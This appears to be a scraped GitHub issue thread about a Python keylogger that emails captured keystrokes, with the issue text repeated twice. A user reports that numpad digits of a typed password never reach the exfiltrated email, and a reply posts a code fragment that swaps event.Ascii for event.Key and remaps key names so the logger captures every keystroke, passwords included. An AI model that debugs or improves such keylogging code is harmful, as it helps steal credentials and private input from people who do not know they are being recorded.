You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The script basically works fine i tested it with 'email' option the problem is when i type numbers:
in the keyboard we have 2 options to set numbers:
the numbers above that are including( !@#$%^&*() = 1234567890) the script thinks that the numbers are symbols and print the numbers as !@#$%^& instead of 12345678.... now i dont have problem with that
the real problem is when i type the right side of the keyboard numbers (where is the NUMLOCK button) i get an empty email for example i type
username : [email protected]
password : 123456789 (right side of the keyboard)
i get an email that prints just : username: [email protected]
without the password...
any ideas???
The text was updated successfully, but these errors were encountered:
I solved this problem by writing event.Key instead of event.Ascii. Yes, in that way, the program gives the output like "Enter, "Lshift", "Escape","Numpad9". But I solved this second issue by a workaround. I wrote a simple algorithm that converts these outputs into the keys I want. The code is as follows:
global data
keylog = event.Key
if str(keylog) in list(key_strokes.keys()):
keylog = key_strokes[keylog]
data = data + keylog
else:
data = data + keylog
return True`
The script basically works fine i tested it with 'email' option the problem is when i type numbers:
in the keyboard we have 2 options to set numbers:
the numbers above that are including( !@#$%^&*() = 1234567890) the script thinks that the numbers are symbols and print the numbers as !@#$%^& instead of 12345678.... now i dont have problem with that
the real problem is when i type the right side of the keyboard numbers (where is the NUMLOCK button) i get an empty email for example i type
username : [email protected]
password : 123456789 (right side of the keyboard)
i get an email that prints just : username: [email protected]
without the password...
any ideas???
The text was updated successfully, but these errors were encountered: